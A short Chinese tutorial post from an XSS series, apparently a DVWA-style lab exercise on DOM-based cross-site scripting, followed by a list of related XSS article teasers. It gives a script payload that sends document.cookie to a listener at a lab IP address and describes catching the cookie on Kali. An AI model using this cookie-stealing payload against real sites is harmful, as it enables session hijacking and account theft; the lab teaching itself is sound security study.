二十五、XSS跨站攻击-(5)DOM型跨站

作者: cybeyond | 来源:发表于2017-12-15 11:17 被阅读0次

                                 目录

1.简介
2.利用DOM型xss获取cookie

DOM型xss是一套JS和其他语言可调用的标准的API，即利用JavaScript跨平台的特性，通过调用DOM提供的相应接口执行相关功能。

图例

在“xss reflected”中测试存储型xss，在输入框中写入如下内容：

<script>var img=document.createElement("img");img.src="http://192.168.50.115:88/log?"+escape(document.cookie);</script>
//创建一个页面元素为img，其来源为src的地址

在kali上开启监听，然后点击提交，可以查看到cookie信息

查看监听结果

前端攻击和防御(一)XSS跨站脚本攻击
（一）XSS跨站脚本攻击参考：XSS站脚本攻击 (1)XSS简介 XSS攻击全称跨站脚本攻击(Cross Sit...
二十五、XSS跨站攻击-(5)DOM型跨站
目录1.简介2.利用DOM型xss获取cookie 1、简介 DOM型xss是一套JS和其他语言可调用的标准的AP...
web 安全
一、跨站脚本攻击—XSS 1、XSS - 简介 XSS 是跨站脚本攻击（Cross Site Scripting）...
常见前端安全性问题
1.跨站脚本攻击(XSS攻击) XSS(Cross Site Scripting)，跨站脚本攻击。XSS是常见的W...
如何防范常见的Web攻击
XSS XSS攻击：跨站脚本攻击(Cross Site Scripting)，为不和 CSS混淆，故将跨站脚本攻击...
web大前端开发中一些常见的安全性问题
跨站脚本攻击（XSS攻击）原理：跨站脚本攻击(Cross Site Script为了区别于CSS简称为XSS)...
Web安全系列之XSS攻击
什么是XSS攻击 XSS（Cross Site Scripting）中文名称是：跨站脚本攻击。XSS重点不在跨站，...
WEB网站常见的受攻击方式及预防手段
跨站脚本攻击(XSS) 跨站脚本攻击（XSS，Cross-site scripting）是最常见和基本的攻击WEB...
XSS
跨站脚本攻击：cross site scripting XSS 原理XSS为跨站脚本攻击，恶意攻击者往Web页面里...
python的flask解决xss攻击漏洞
xss漏洞解决跨站脚本攻击的原理 XSS又叫CSS (Cross Site Script) ，跨站脚本攻击。它指...